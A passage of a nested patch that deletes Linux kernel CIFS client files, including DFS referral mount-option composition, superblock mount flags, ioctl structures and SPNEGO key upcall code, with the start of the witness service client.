+-	size_t unclen;
+-	char *dev;
+-	char *pos;
+-
+-	/* skip over any preceding delimiters */
+-	nodename += strspn(nodename, "\\");
+-	if (!*nodename)
+-		return ERR_PTR(-EINVAL);
+-
+-	/* get length of UNC and set pos to last char */
+-	unclen = strlen(nodename);
+-	pos = nodename + unclen - 1;
+-
+-	/* trim off any trailing delimiters */
+-	while (*pos == '\\') {
+-		--pos;
+-		--unclen;
+-	}
+-
+-	/* allocate a buffer:
+-	 * +2 for preceding "//"
+-	 * +1 for delimiter between UNC and prepath
+-	 * +1 for trailing NULL
+-	 */
+-	pplen = prepath ? strlen(prepath) : 0;
+-	dev = kmalloc(2 + unclen + 1 + pplen + 1, GFP_KERNEL);
+-	if (!dev)
+-		return ERR_PTR(-ENOMEM);
+-
+-	pos = dev;
+-	/* add the initial "//" */
+-	*pos = '/';
+-	++pos;
+-	*pos = '/';
+-	++pos;
+-
+-	/* copy in the UNC portion from referral */
+-	memcpy(pos, nodename, unclen);
+-	pos += unclen;
+-
+-	/* copy the prefixpath remainder (if there is one) */
+-	if (pplen) {
+-		*pos = '/';
+-		++pos;
+-		memcpy(pos, prepath, pplen);
+-		pos += pplen;
+-	}
+-
+-	/* NULL terminator */
+-	*pos = '\0';
+-
+-	convert_delimiter(dev, '/');
+-	return dev;
+-}
+-
+-
+-/**
+- * cifs_compose_mount_options	-	creates mount options for referral
+- * @sb_mountdata:	parent/root DFS mount options (template)
+- * @fullpath:		full path in UNC format
+- * @ref:		optional server's referral
+- * @devname:		return the built cifs device name if passed pointer not NULL
+- * creates mount options for submount based on template options sb_mountdata
+- * and replacing unc,ip,prefixpath options with ones we've got form ref_unc.
+- *
+- * Returns: pointer to new mount options or ERR_PTR.
+- * Caller is responsible for freeing returned value if it is not error.
+- */
+-char *cifs_compose_mount_options(const char *sb_mountdata,
+-				 const char *fullpath,
+-				 const struct dfs_info3_param *ref,
+-				 char **devname)
+-{
+-	int rc;
+-	char *name;
+-	char *mountdata = NULL;
+-	const char *prepath = NULL;
+-	int md_len;
+-	char *tkn_e;
+-	char *srvIP = NULL;
+-	char sep = ',';
+-	int off, noff;
+-
+-	if (sb_mountdata == NULL)
+-		return ERR_PTR(-EINVAL);
+-
+-	if (ref) {
+-		if (WARN_ON_ONCE(!ref->node_name || ref->path_consumed < 0))
+-			return ERR_PTR(-EINVAL);
+-
+-		if (strlen(fullpath) - ref->path_consumed) {
+-			prepath = fullpath + ref->path_consumed;
+-			/* skip initial delimiter */
+-			if (*prepath == '/' || *prepath == '\\')
+-				prepath++;
+-		}
+-
+-		name = cifs_build_devname(ref->node_name, prepath);
+-		if (IS_ERR(name)) {
+-			rc = PTR_ERR(name);
+-			name = NULL;
+-			goto compose_mount_options_err;
+-		}
+-	} else {
+-		name = cifs_build_devname((char *)fullpath, NULL);
+-		if (IS_ERR(name)) {
+-			rc = PTR_ERR(name);
+-			name = NULL;
+-			goto compose_mount_options_err;
+-		}
+-	}
+-
+-	rc = dns_resolve_server_name_to_ip(name, &srvIP, NULL);
+-	if (rc < 0) {
+-		cifs_dbg(FYI, "%s: Failed to resolve server part of %s to IP: %d\n",
+-			 __func__, name, rc);
+-		goto compose_mount_options_err;
+-	}
+-
+-	/*
+-	 * In most cases, we'll be building a shorter string than the original,
+-	 * but we do have to assume that the address in the ip= option may be
+-	 * much longer than the original. Add the max length of an address
+-	 * string to the length of the original string to allow for worst case.
+-	 */
+-	md_len = strlen(sb_mountdata) + INET6_ADDRSTRLEN;
+-	mountdata = kzalloc(md_len + sizeof("ip=") + 1, GFP_KERNEL);
+-	if (mountdata == NULL) {
+-		rc = -ENOMEM;
+-		goto compose_mount_options_err;
+-	}
+-
+-	/* copy all options except of unc,ip,prefixpath */
+-	off = 0;
+-	if (strncmp(sb_mountdata, "sep=", 4) == 0) {
+-			sep = sb_mountdata[4];
+-			strncpy(mountdata, sb_mountdata, 5);
+-			off += 5;
+-	}
+-
+-	do {
+-		tkn_e = strchr(sb_mountdata + off, sep);
+-		if (tkn_e == NULL)
+-			noff = strlen(sb_mountdata + off);
+-		else
+-			noff = tkn_e - (sb_mountdata + off) + 1;
+-
+-		if (strncasecmp(sb_mountdata + off, "cruid=", 6) == 0) {
+-			off += noff;
+-			continue;
+-		}
+-		if (strncasecmp(sb_mountdata + off, "unc=", 4) == 0) {
+-			off += noff;
+-			continue;
+-		}
+-		if (strncasecmp(sb_mountdata + off, "ip=", 3) == 0) {
+-			off += noff;
+-			continue;
+-		}
+-		if (strncasecmp(sb_mountdata + off, "prefixpath=", 11) == 0) {
+-			off += noff;
+-			continue;
+-		}
+-		strncat(mountdata, sb_mountdata + off, noff);
+-		off += noff;
+-	} while (tkn_e);
+-	strcat(mountdata, sb_mountdata + off);
+-	mountdata[md_len] = '\0';
+-
+-	/* copy new IP and ref share name */
+-	if (mountdata[strlen(mountdata) - 1] != sep)
+-		strncat(mountdata, &sep, 1);
+-	strcat(mountdata, "ip=");
+-	strcat(mountdata, srvIP);
+-
+-	if (devname)
+-		*devname = name;
+-	else
+-		kfree(name);
+-
+-	/*cifs_dbg(FYI, "%s: parent mountdata: %s\n", __func__, sb_mountdata);*/
+-	/*cifs_dbg(FYI, "%s: submount mountdata: %s\n", __func__, mountdata );*/
+-
+-compose_mount_options_out:
+-	kfree(srvIP);
+-	return mountdata;
+-
+-compose_mount_options_err:
+-	kfree(mountdata);
+-	mountdata = ERR_PTR(rc);
+-	kfree(name);
+-	goto compose_mount_options_out;
+-}
+-
+-/**
+- * cifs_dfs_do_mount - mounts specified path using DFS full path
+- *
+- * Always pass down @fullpath to smb3_do_mount() so we can use the root server
+- * to perform failover in case we failed to connect to the first target in the
+- * referral.
+- *
+- * @mntpt:		directory entry for the path we are trying to automount
+- * @cifs_sb:		parent/root superblock
+- * @fullpath:		full path in UNC format
+- */
+-static struct vfsmount *cifs_dfs_do_mount(struct dentry *mntpt,
+-					  struct cifs_sb_info *cifs_sb,
+-					  const char *fullpath)
+-{
+-	struct vfsmount *mnt;
+-	char *mountdata;
+-	char *devname;
+-
+-	devname = kstrdup(fullpath, GFP_KERNEL);
+-	if (!devname)
+-		return ERR_PTR(-ENOMEM);
+-
+-	convert_delimiter(devname, '/');
+-
+-	/* TODO: change to call fs_context_for_mount(), fill in context directly, call fc_mount */
+-
+-	/* See afs_mntpt_do_automount in fs/afs/mntpt.c for an example */
+-
+-	/* strip first '\' from fullpath */
+-	mountdata = cifs_compose_mount_options(cifs_sb->ctx->mount_options,
+-					       fullpath + 1, NULL, NULL);
+-	if (IS_ERR(mountdata)) {
+-		kfree(devname);
+-		return (struct vfsmount *)mountdata;
+-	}
+-
+-	mnt = vfs_submount(mntpt, &cifs_fs_type, devname, mountdata);
+-	kfree(mountdata);
+-	kfree(devname);
+-	return mnt;
+-}
+-
+-/*
+- * Create a vfsmount that we can automount
+- */
+-static struct vfsmount *cifs_dfs_do_automount(struct dentry *mntpt)
+-{
+-	struct cifs_sb_info *cifs_sb;
+-	void *page;
+-	char *full_path;
+-	struct vfsmount *mnt;
+-
+-	cifs_dbg(FYI, "in %s\n", __func__);
+-	BUG_ON(IS_ROOT(mntpt));
+-
+-	/*
+-	 * The MSDFS spec states that paths in DFS referral requests and
+-	 * responses must be prefixed by a single '\' character instead of
+-	 * the double backslashes usually used in the UNC. This function
+-	 * gives us the latter, so we must adjust the result.
+-	 */
+-	cifs_sb = CIFS_SB(mntpt->d_sb);
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) {
+-		mnt = ERR_PTR(-EREMOTE);
+-		goto cdda_exit;
+-	}
+-
+-	page = alloc_dentry_path();
+-	/* always use tree name prefix */
+-	full_path = build_path_from_dentry_optional_prefix(mntpt, page, true);
+-	if (IS_ERR(full_path)) {
+-		mnt = ERR_CAST(full_path);
+-		goto free_full_path;
+-	}
+-
+-	convert_delimiter(full_path, '\\');
+-	cifs_dbg(FYI, "%s: full_path: %s\n", __func__, full_path);
+-
+-	mnt = cifs_dfs_do_mount(mntpt, cifs_sb, full_path);
+-	cifs_dbg(FYI, "%s: cifs_dfs_do_mount:%s , mnt:%p\n", __func__, full_path + 1, mnt);
+-
+-free_full_path:
+-	free_dentry_path(page);
+-cdda_exit:
+-	cifs_dbg(FYI, "leaving %s\n" , __func__);
+-	return mnt;
+-}
+-
+-/*
+- * Attempt to automount the referral
+- */
+-struct vfsmount *cifs_dfs_d_automount(struct path *path)
+-{
+-	struct vfsmount *newmnt;
+-
+-	cifs_dbg(FYI, "in %s\n", __func__);
+-
+-	newmnt = cifs_dfs_do_automount(path->dentry);
+-	if (IS_ERR(newmnt)) {
+-		cifs_dbg(FYI, "leaving %s [automount failed]\n" , __func__);
+-		return newmnt;
+-	}
+-
+-	mntget(newmnt); /* prevent immediate expiration */
+-	mnt_set_expiry(newmnt, &cifs_dfs_automount_list);
+-	schedule_delayed_work(&cifs_dfs_automount_task,
+-			      cifs_dfs_mountpoint_expiry_timeout);
+-	cifs_dbg(FYI, "leaving %s [ok]\n" , __func__);
+-	return newmnt;
+-}
+-
+-const struct inode_operations cifs_dfs_referral_inode_operations = {
+-};
+diff --git a/fs/cifs/cifs_fs_sb.h b/fs/cifs/cifs_fs_sb.h
+deleted file mode 100644
+index 013a4bd65280c..0000000000000
+--- a/fs/cifs/cifs_fs_sb.h
++++ /dev/null
+@@ -1,76 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002,2004
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-#include <linux/rbtree.h>
+-
+-#ifndef _CIFS_FS_SB_H
+-#define _CIFS_FS_SB_H
+-
+-#include <linux/backing-dev.h>
+-
+-#define CIFS_MOUNT_NO_PERM      1 /* do not do client vfs_perm check */
+-#define CIFS_MOUNT_SET_UID      2 /* set current's euid in create etc. */
+-#define CIFS_MOUNT_SERVER_INUM  4 /* inode numbers from uniqueid from server  */
+-#define CIFS_MOUNT_DIRECT_IO    8 /* do not write nor read through page cache */
+-#define CIFS_MOUNT_NO_XATTR     0x10  /* if set - disable xattr support       */
+-#define CIFS_MOUNT_MAP_SPECIAL_CHR 0x20 /* remap illegal chars in filenames   */
+-#define CIFS_MOUNT_POSIX_PATHS  0x40  /* Negotiate posix pathnames if possible*/
+-#define CIFS_MOUNT_UNX_EMUL     0x80  /* Network compat with SFUnix emulation */
+-#define CIFS_MOUNT_NO_BRL       0x100 /* No sending byte range locks to srv   */
+-#define CIFS_MOUNT_CIFS_ACL     0x200 /* send ACL requests to non-POSIX srv   */
+-#define CIFS_MOUNT_OVERR_UID    0x400 /* override uid returned from server    */
+-#define CIFS_MOUNT_OVERR_GID    0x800 /* override gid returned from server    */
+-#define CIFS_MOUNT_DYNPERM      0x1000 /* allow in-memory only mode setting   */
+-#define CIFS_MOUNT_NOPOSIXBRL   0x2000 /* mandatory not posix byte range lock */
+-#define CIFS_MOUNT_NOSSYNC      0x4000 /* don't do slow SMBflush on every sync*/
+-#define CIFS_MOUNT_FSCACHE	0x8000 /* local caching enabled */
+-#define CIFS_MOUNT_MF_SYMLINKS	0x10000 /* Minshall+French Symlinks enabled */
+-#define CIFS_MOUNT_MULTIUSER	0x20000 /* multiuser mount */
+-#define CIFS_MOUNT_STRICT_IO	0x40000 /* strict cache mode */
+-#define CIFS_MOUNT_RWPIDFORWARD	0x80000 /* use pid forwarding for rw */
+-#define CIFS_MOUNT_POSIXACL	0x100000 /* mirror of SB_POSIXACL in mnt_cifs_flags */
+-#define CIFS_MOUNT_CIFS_BACKUPUID 0x200000 /* backup intent bit for a user */
+-#define CIFS_MOUNT_CIFS_BACKUPGID 0x400000 /* backup intent bit for a group */
+-#define CIFS_MOUNT_MAP_SFM_CHR	0x800000 /* SFM/MAC mapping for illegal chars */
+-#define CIFS_MOUNT_USE_PREFIX_PATH 0x1000000 /* make subpath with unaccessible
+-					      * root mountable
+-					      */
+-#define CIFS_MOUNT_UID_FROM_ACL 0x2000000 /* try to get UID via special SID */
+-#define CIFS_MOUNT_NO_HANDLE_CACHE 0x4000000 /* disable caching dir handles */
+-#define CIFS_MOUNT_NO_DFS 0x8000000 /* disable DFS resolving */
+-#define CIFS_MOUNT_MODE_FROM_SID 0x10000000 /* retrieve mode from special ACE */
+-#define CIFS_MOUNT_RO_CACHE	0x20000000  /* assumes share will not change */
+-#define CIFS_MOUNT_RW_CACHE	0x40000000  /* assumes only client accessing */
+-#define CIFS_MOUNT_SHUTDOWN	0x80000000
+-
+-struct cifs_sb_info {
+-	struct rb_root tlink_tree;
+-	spinlock_t tlink_tree_lock;
+-	struct tcon_link *master_tlink;
+-	struct nls_table *local_nls;
+-	struct smb3_fs_context *ctx;
+-	atomic_t active;
+-	unsigned int mnt_cifs_flags;
+-	struct delayed_work prune_tlinks;
+-	struct rcu_head rcu;
+-
+-	/* only used when CIFS_MOUNT_USE_PREFIX_PATH is set */
+-	char *prepath;
+-
+-	/* randomly generated 128-bit number for indexing dfs mount groups in referral cache */
+-	uuid_t dfs_mount_id;
+-	/*
+-	 * Indicate whether serverino option was turned off later
+-	 * (cifs_autodisable_serverino) in order to match new mounts.
+-	 */
+-	bool mnt_cifs_serverino_autodisabled;
+-	/*
+-	 * Available once the mount has completed.
+-	 */
+-	struct dentry *root;
+-};
+-#endif				/* _CIFS_FS_SB_H */
+diff --git a/fs/cifs/cifs_ioctl.h b/fs/cifs/cifs_ioctl.h
+deleted file mode 100644
+index d86d78d5bfdc1..0000000000000
+--- a/fs/cifs/cifs_ioctl.h
++++ /dev/null
+@@ -1,126 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Structure definitions for io control for cifs/smb3
+- *
+- *   Copyright (c) 2015 Steve French <steve.french@primarydata.com>
+- *
+- */
+-
+-struct smb_mnt_fs_info {
+-	__u32	version; /* 0001 */
+-	__u16	protocol_id;
+-	__u16	tcon_flags;
+-	__u32	vol_serial_number;
+-	__u32	vol_create_time;
+-	__u32	share_caps;
+-	__u32	share_flags;
+-	__u32	sector_flags;
+-	__u32	optimal_sector_size;
+-	__u32	max_bytes_chunk;
+-	__u32	fs_attributes;
+-	__u32	max_path_component;
+-	__u32	device_type;
+-	__u32	device_characteristics;
+-	__u32	maximal_access;
+-	__u64   cifs_posix_caps;
+-} __packed;
+-
+-struct smb_snapshot_array {
+-	__u32	number_of_snapshots;
+-	__u32	number_of_snapshots_returned;
+-	__u32	snapshot_array_size;
+-	/*	snapshots[]; */
+-} __packed;
+-
+-/* query_info flags */
+-#define PASSTHRU_QUERY_INFO	0x00000000
+-#define PASSTHRU_FSCTL		0x00000001
+-#define PASSTHRU_SET_INFO	0x00000002
+-struct smb_query_info {
+-	__u32   info_type;
+-	__u32   file_info_class;
+-	__u32   additional_information;
+-	__u32   flags;
+-	__u32	input_buffer_length;
+-	__u32	output_buffer_length;
+-	/* char buffer[]; */
+-} __packed;
+-
+-/*
+- * Dumping the commonly used 16 byte (e.g. CCM and GCM128) keys still supported
+- * for backlevel compatibility, but is not sufficient for dumping the less
+- * frequently used GCM256 (32 byte) keys (see the newer "CIFS_DUMP_FULL_KEY"
+- * ioctl for dumping decryption info for GCM256 mounts)
+- */
+-struct smb3_key_debug_info {
+-	__u64	Suid;
+-	__u16	cipher_type;
+-	__u8	auth_key[16]; /* SMB2_NTLMV2_SESSKEY_SIZE */
+-	__u8	smb3encryptionkey[SMB3_SIGN_KEY_SIZE];
+-	__u8	smb3decryptionkey[SMB3_SIGN_KEY_SIZE];
+-} __packed;
+-
+-/*
+- * Dump variable-sized keys
+- */
+-struct smb3_full_key_debug_info {
+-	/* INPUT: size of userspace buffer */
+-	__u32   in_size;
+-
+-	/*
+-	 * INPUT: 0 for current user, otherwise session to dump
+-	 * OUTPUT: session id that was dumped
+-	 */
+-	__u64	session_id;
+-	__u16	cipher_type;
+-	__u8    session_key_length;
+-	__u8    server_in_key_length;
+-	__u8    server_out_key_length;
+-	__u8    data[];
+-	/*
+-	 * return this struct with the keys appended at the end:
+-	 * __u8 session_key[session_key_length];
+-	 * __u8 server_in_key[server_in_key_length];
+-	 * __u8 server_out_key[server_out_key_length];
+-	 */
+-} __packed;
+-
+-struct smb3_notify {
+-	__u32	completion_filter;
+-	bool	watch_tree;
+-} __packed;
+-
+-struct smb3_notify_info {
+-	__u32	completion_filter;
+-	bool	watch_tree;
+-	__u32   data_len; /* size of notify data below */
+-	__u8	notify_data[];
+-} __packed;
+-
+-#define CIFS_IOCTL_MAGIC	0xCF
+-#define CIFS_IOC_COPYCHUNK_FILE	_IOW(CIFS_IOCTL_MAGIC, 3, int)
+-#define CIFS_IOC_SET_INTEGRITY  _IO(CIFS_IOCTL_MAGIC, 4)
+-#define CIFS_IOC_GET_MNT_INFO _IOR(CIFS_IOCTL_MAGIC, 5, struct smb_mnt_fs_info)
+-#define CIFS_ENUMERATE_SNAPSHOTS _IOR(CIFS_IOCTL_MAGIC, 6, struct smb_snapshot_array)
+-#define CIFS_QUERY_INFO _IOWR(CIFS_IOCTL_MAGIC, 7, struct smb_query_info)
+-#define CIFS_DUMP_KEY _IOWR(CIFS_IOCTL_MAGIC, 8, struct smb3_key_debug_info)
+-#define CIFS_IOC_NOTIFY _IOW(CIFS_IOCTL_MAGIC, 9, struct smb3_notify)
+-#define CIFS_DUMP_FULL_KEY _IOWR(CIFS_IOCTL_MAGIC, 10, struct smb3_full_key_debug_info)
+-#define CIFS_IOC_NOTIFY_INFO _IOWR(CIFS_IOCTL_MAGIC, 11, struct smb3_notify_info)
+-#define CIFS_IOC_SHUTDOWN _IOR ('X', 125, __u32)
+-
+-/*
+- * Flags for going down operation
+- */
+-#define CIFS_GOING_FLAGS_DEFAULT                0x0     /* going down */
+-#define CIFS_GOING_FLAGS_LOGFLUSH               0x1     /* flush log but not data */
+-#define CIFS_GOING_FLAGS_NOLOGFLUSH             0x2     /* don't flush log nor data */
+-
+-static inline bool cifs_forced_shutdown(struct cifs_sb_info *sbi)
+-{
+-	if (CIFS_MOUNT_SHUTDOWN & sbi->mnt_cifs_flags)
+-		return true;
+-	else
+-		return false;
+-}
+diff --git a/fs/cifs/cifs_spnego.c b/fs/cifs/cifs_spnego.c
+deleted file mode 100644
+index 342717bf1dc28..0000000000000
+--- a/fs/cifs/cifs_spnego.c
++++ /dev/null
+@@ -1,236 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *   SPNEGO upcall management for CIFS
+- *
+- *   Copyright (c) 2007 Red Hat, Inc.
+- *   Author(s): Jeff Layton (jlayton@redhat.com)
+- *
+- */
+-
+-#include <linux/list.h>
+-#include <linux/slab.h>
+-#include <linux/string.h>
+-#include <keys/user-type.h>
+-#include <linux/key-type.h>
+-#include <linux/keyctl.h>
+-#include <linux/inet.h>
+-#include "cifsglob.h"
+-#include "cifs_spnego.h"
+-#include "cifs_debug.h"
+-#include "cifsproto.h"
+-static const struct cred *spnego_cred;
+-
+-/* create a new cifs key */
+-static int
+-cifs_spnego_key_instantiate(struct key *key, struct key_preparsed_payload *prep)
+-{
+-	char *payload;
+-	int ret;
+-
+-	ret = -ENOMEM;
+-	payload = kmemdup(prep->data, prep->datalen, GFP_KERNEL);
+-	if (!payload)
+-		goto error;
+-
+-	/* attach the data */
+-	key->payload.data[0] = payload;
+-	ret = 0;
+-
+-error:
+-	return ret;
+-}
+-
+-static void
+-cifs_spnego_key_destroy(struct key *key)
+-{
+-	kfree(key->payload.data[0]);
+-}
+-
+-
+-/*
+- * keytype for CIFS spnego keys
+- */
+-struct key_type cifs_spnego_key_type = {
+-	.name		= "cifs.spnego",
+-	.instantiate	= cifs_spnego_key_instantiate,
+-	.destroy	= cifs_spnego_key_destroy,
+-	.describe	= user_describe,
+-};
+-
+-/* length of longest version string e.g.  strlen("ver=0xFF") */
+-#define MAX_VER_STR_LEN		8
+-
+-/* length of longest security mechanism name, eg in future could have
+- * strlen(";sec=ntlmsspi") */
+-#define MAX_MECH_STR_LEN	13
+-
+-/* strlen of "host=" */
+-#define HOST_KEY_LEN		5
+-
+-/* strlen of ";ip4=" or ";ip6=" */
+-#define IP_KEY_LEN		5
+-
+-/* strlen of ";uid=0x" */
+-#define UID_KEY_LEN		7
+-
+-/* strlen of ";creduid=0x" */
+-#define CREDUID_KEY_LEN		11
+-
+-/* strlen of ";user=" */
+-#define USER_KEY_LEN		6
+-
+-/* strlen of ";pid=0x" */
+-#define PID_KEY_LEN		7
+-
+-/* get a key struct with a SPNEGO security blob, suitable for session setup */
+-struct key *
+-cifs_get_spnego_key(struct cifs_ses *sesInfo,
+-		    struct TCP_Server_Info *server)
+-{
+-	struct sockaddr_in *sa = (struct sockaddr_in *) &server->dstaddr;
+-	struct sockaddr_in6 *sa6 = (struct sockaddr_in6 *) &server->dstaddr;
+-	char *description, *dp;
+-	size_t desc_len;
+-	struct key *spnego_key;
+-	const char *hostname = server->hostname;
+-	const struct cred *saved_cred;
+-
+-	/* length of fields (with semicolons): ver=0xyz ip4=ipaddress
+-	   host=hostname sec=mechanism uid=0xFF user=username */
+-	desc_len = MAX_VER_STR_LEN +
+-		   HOST_KEY_LEN + strlen(hostname) +
+-		   IP_KEY_LEN + INET6_ADDRSTRLEN +
+-		   MAX_MECH_STR_LEN +
+-		   UID_KEY_LEN + (sizeof(uid_t) * 2) +
+-		   CREDUID_KEY_LEN + (sizeof(uid_t) * 2) +
+-		   PID_KEY_LEN + (sizeof(pid_t) * 2) + 1;
+-
+-	if (sesInfo->user_name)
+-		desc_len += USER_KEY_LEN + strlen(sesInfo->user_name);
+-
+-	spnego_key = ERR_PTR(-ENOMEM);
+-	description = kzalloc(desc_len, GFP_KERNEL);
+-	if (description == NULL)
+-		goto out;
+-
+-	dp = description;
+-	/* start with version and hostname portion of UNC string */
+-	spnego_key = ERR_PTR(-EINVAL);
+-	sprintf(dp, "ver=0x%x;host=%s;", CIFS_SPNEGO_UPCALL_VERSION,
+-		hostname);
+-	dp = description + strlen(description);
+-
+-	/* add the server address */
+-	if (server->dstaddr.ss_family == AF_INET)
+-		sprintf(dp, "ip4=%pI4", &sa->sin_addr);
+-	else if (server->dstaddr.ss_family == AF_INET6)
+-		sprintf(dp, "ip6=%pI6", &sa6->sin6_addr);
+-	else
+-		goto out;
+-
+-	dp = description + strlen(description);
+-
+-	/* for now, only sec=krb5 and sec=mskrb5 are valid */
+-	if (server->sec_kerberos)
+-		sprintf(dp, ";sec=krb5");
+-	else if (server->sec_mskerberos)
+-		sprintf(dp, ";sec=mskrb5");
+-	else {
+-		cifs_dbg(VFS, "unknown or missing server auth type, use krb5\n");
+-		sprintf(dp, ";sec=krb5");
+-	}
+-
+-	dp = description + strlen(description);
+-	sprintf(dp, ";uid=0x%x",
+-		from_kuid_munged(&init_user_ns, sesInfo->linux_uid));
+-
+-	dp = description + strlen(description);
+-	sprintf(dp, ";creduid=0x%x",
+-		from_kuid_munged(&init_user_ns, sesInfo->cred_uid));
+-
+-	if (sesInfo->user_name) {
+-		dp = description + strlen(description);
+-		sprintf(dp, ";user=%s", sesInfo->user_name);
+-	}
+-
+-	dp = description + strlen(description);
+-	sprintf(dp, ";pid=0x%x", current->pid);
+-
+-	cifs_dbg(FYI, "key description = %s\n", description);
+-	saved_cred = override_creds(spnego_cred);
+-	spnego_key = request_key(&cifs_spnego_key_type, description, "");
+-	revert_creds(saved_cred);
+-
+-#ifdef CONFIG_CIFS_DEBUG2
+-	if (cifsFYI && !IS_ERR(spnego_key)) {
+-		struct cifs_spnego_msg *msg = spnego_key->payload.data[0];
+-		cifs_dump_mem("SPNEGO reply blob:", msg->data, min(1024U,
+-				msg->secblob_len + msg->sesskey_len));
+-	}
+-#endif /* CONFIG_CIFS_DEBUG2 */
+-
+-out:
+-	kfree(description);
+-	return spnego_key;
+-}
+-
+-int
+-init_cifs_spnego(void)
+-{
+-	struct cred *cred;
+-	struct key *keyring;
+-	int ret;
+-
+-	cifs_dbg(FYI, "Registering the %s key type\n",
+-		 cifs_spnego_key_type.name);
+-
+-	/*
+-	 * Create an override credential set with special thread keyring for
+-	 * spnego upcalls.
+-	 */
+-
+-	cred = prepare_kernel_cred(NULL);
+-	if (!cred)
+-		return -ENOMEM;
+-
+-	keyring = keyring_alloc(".cifs_spnego",
+-				GLOBAL_ROOT_UID, GLOBAL_ROOT_GID, cred,
+-				(KEY_POS_ALL & ~KEY_POS_SETATTR) |
+-				KEY_USR_VIEW | KEY_USR_READ,
+-				KEY_ALLOC_NOT_IN_QUOTA, NULL, NULL);
+-	if (IS_ERR(keyring)) {
+-		ret = PTR_ERR(keyring);
+-		goto failed_put_cred;
+-	}
+-
+-	ret = register_key_type(&cifs_spnego_key_type);
+-	if (ret < 0)
+-		goto failed_put_key;
+-
+-	/*
+-	 * instruct request_key() to use this special keyring as a cache for
+-	 * the results it looks up
+-	 */
+-	set_bit(KEY_FLAG_ROOT_CAN_CLEAR, &keyring->flags);
+-	cred->thread_keyring = keyring;
+-	cred->jit_keyring = KEY_REQKEY_DEFL_THREAD_KEYRING;
+-	spnego_cred = cred;
+-
+-	cifs_dbg(FYI, "cifs spnego keyring: %d\n", key_serial(keyring));
+-	return 0;
+-
+-failed_put_key:
+-	key_put(keyring);
+-failed_put_cred:
+-	put_cred(cred);
+-	return ret;
+-}
+-
+-void
+-exit_cifs_spnego(void)
+-{
+-	key_revoke(spnego_cred->thread_keyring);
+-	unregister_key_type(&cifs_spnego_key_type);
+-	put_cred(spnego_cred);
+-	cifs_dbg(FYI, "Unregistered %s key type\n", cifs_spnego_key_type.name);
+-}
+diff --git a/fs/cifs/cifs_spnego.h b/fs/cifs/cifs_spnego.h
+deleted file mode 100644
+index 7f102ffeb6750..0000000000000
+--- a/fs/cifs/cifs_spnego.h
++++ /dev/null
+@@ -1,36 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *   SPNEGO upcall management for CIFS
+- *
+- *   Copyright (c) 2007 Red Hat, Inc.
+- *   Author(s): Jeff Layton (jlayton@redhat.com)
+- *              Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#ifndef _CIFS_SPNEGO_H
+-#define _CIFS_SPNEGO_H
+-
+-#define CIFS_SPNEGO_UPCALL_VERSION 2
+-
+-/*
+- * The version field should always be set to CIFS_SPNEGO_UPCALL_VERSION.
+- * The flags field is for future use. The request-key callout should set
+- * sesskey_len and secblob_len, and then concatenate the SessKey+SecBlob
+- * and stuff it in the data field.
+- */
+-struct cifs_spnego_msg {
+-	uint32_t	version;
+-	uint32_t	flags;
+-	uint32_t	sesskey_len;
+-	uint32_t	secblob_len;
+-	uint8_t		data[1];
+-};
+-
+-#ifdef __KERNEL__
+-extern struct key_type cifs_spnego_key_type;
+-extern struct key *cifs_get_spnego_key(struct cifs_ses *sesInfo,
+-				       struct TCP_Server_Info *server);
+-#endif /* KERNEL */
+-
+-#endif /* _CIFS_SPNEGO_H */
+diff --git a/fs/cifs/cifs_spnego_negtokeninit.asn1 b/fs/cifs/cifs_spnego_negtokeninit.asn1
+deleted file mode 100644
+index 181c083887d51..0000000000000
+--- a/fs/cifs/cifs_spnego_negtokeninit.asn1
++++ /dev/null
+@@ -1,40 +0,0 @@
+-GSSAPI ::=
+-	[APPLICATION 0] IMPLICIT SEQUENCE {
+-		thisMech
+-			OBJECT IDENTIFIER ({cifs_gssapi_this_mech}),
+-		negotiationToken
+-			NegotiationToken
+-	}
+-
+-MechType ::= OBJECT IDENTIFIER ({cifs_neg_token_init_mech_type})
+-
+-MechTypeList ::= SEQUENCE OF MechType
+-
+-NegHints ::= SEQUENCE {
+-	hintName
+-		[0] GeneralString OPTIONAL,
+-	hintAddress
+-		[1] OCTET STRING OPTIONAL
+-	}
+-
+-NegTokenInit2 ::=
+-	SEQUENCE {
+-		mechTypes
+-			[0] MechTypeList OPTIONAL,
+-		reqFlags
+-			[1] BIT STRING OPTIONAL,
+-		mechToken
+-			[2] OCTET STRING OPTIONAL,
+-		negHints
+-			[3] NegHints OPTIONAL,
+-		mechListMIC
+-			[3] OCTET STRING OPTIONAL
+-	}
+-
+-NegotiationToken ::=
+-	CHOICE {
+-		negTokenInit
+-			[0] NegTokenInit2,
+-		negTokenTarg
+-			[1] ANY
+-	}
+diff --git a/fs/cifs/cifs_swn.c b/fs/cifs/cifs_swn.c
+deleted file mode 100644
+index 7233c6a7e6d70..0000000000000
+--- a/fs/cifs/cifs_swn.c
++++ /dev/null
+@@ -1,674 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- * Witness Service client for CIFS
+- *
+- * Copyright (c) 2020 Samuel Cabrero <scabrero@suse.de>
+- */
+-
+-#include <linux/kref.h>
+-#include <net/genetlink.h>
+-#include <uapi/linux/cifs/cifs_netlink.h>
+-
+-#include "cifs_swn.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "fscache.h"
+-#include "cifs_debug.h"
+-#include "netlink.h"
+-
+-static DEFINE_IDR(cifs_swnreg_idr);
+-static DEFINE_MUTEX(cifs_swnreg_idr_mutex);
+-
+-struct cifs_swn_reg {
+-	int id;
+-	struct kref ref_count;
+-
+-	const char *net_name;
+-	const char *share_name;
+-	bool net_name_notify;
+-	bool share_name_notify;
+-	bool ip_notify;
+-
+-	struct cifs_tcon *tcon;
+-};
+-
+-static int cifs_swn_auth_info_krb(struct cifs_tcon *tcon, struct sk_buff *skb)
+-{
+-	int ret;
+-
+-	ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_KRB_AUTH);
+-	if (ret < 0)
+-		return ret;
+-
+-	return 0;
+-}
+-
+-static int cifs_swn_auth_info_ntlm(struct cifs_tcon *tcon, struct sk_buff *skb)
+-{
+-	int ret;
